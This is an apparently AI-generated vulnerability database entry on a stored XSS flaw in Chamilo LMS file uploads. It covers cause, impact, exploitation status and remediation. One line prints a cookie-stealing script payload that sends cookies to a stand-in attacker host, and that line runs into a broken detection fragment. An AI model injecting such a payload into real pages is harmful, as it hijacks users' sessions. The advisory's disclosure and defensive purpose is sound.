
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-55208 is a Stored Cross-Site Scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.32, arising from insecure file uploads in the Social Networks feature. A low-privilege authenticated user can upload a malicious file that, when viewed by an administrator in their inbox, executes arbitrary JavaScript in the admin's browser context — enabling full account takeover. The vulnerability was published on March 5, 2026, and is fixed in version 1.11.34. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the file upload handling within Chamilo's Social Networks module. The platform fails to adequately validate or sanitize uploaded file content before rendering it in the admin inbox, allowing an attacker to embed malicious JavaScript payloads within uploaded files. Exploitation requires the attacker to have a low-privilege account on the LMS and relies on an administrator viewing the malicious content in their inbox (user interaction required). The attack vector is network-based with low complexity, and the scope is changed — meaning the injected script executes in the context of the victim's (admin's) browser session rather than the attacker's (GitHub Advisory).
Successful exploitation enables full administrator account takeover via session hijacking, as the malicious JavaScript executes within the admin's authenticated browser session. This grants the attacker all privileges of the compromised admin account, including access to student records, system configuration, and all sensitive data within the LMS. Additionally, the payload can perform unauthorized actions on behalf of the admin, exfiltrate sensitive data, and potentially self-propagate to other users, severely compromising the confidentiality, integrity, and availability of the entire LMS environment (GitHub Advisory).
As of the time of publication, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Red Hat CVE). The EPSS score is approximately 0.047%, indicating a currently low probability of exploitation in the near term. No threat actor attribution or CISA KEV catalog listing has been identified for this vulnerability. However, the low attack complexity and the high-impact outcome (admin takeover) make it an attractive target if exploitation details become public.
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>..html, .svg, .xml) in the Social Networks upload directory containing JavaScript tags or event handlers.The primary remediation is to upgrade Chamilo LMS to version 1.11.34 or later, which contains the official fix for this vulnerability (GitHub Advisory). Until patching is feasible, organizations should restrict file upload capabilities within the Social Networks feature and limit access to trusted users only. Additionally, implementing strict server-side file type validation, content-type enforcement, and output encoding for all user-supplied content — particularly in file upload mechanisms — can reduce exposure. Monitoring admin inbox activity for suspicious or unexpected file uploads is also recommended as a compensating control.
The vulnerability was reported by security researcher dishant550 and disclosed via GitHub Security Advisories on March 5, 2026 (GitHub Advisory). Coverage appeared on The Hacker Wire and was shared on Mastodon, with brief community discussion noting the high severity and admin takeover potential. No major vendor statements beyond the Chamilo advisory or significant analyst commentary have been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."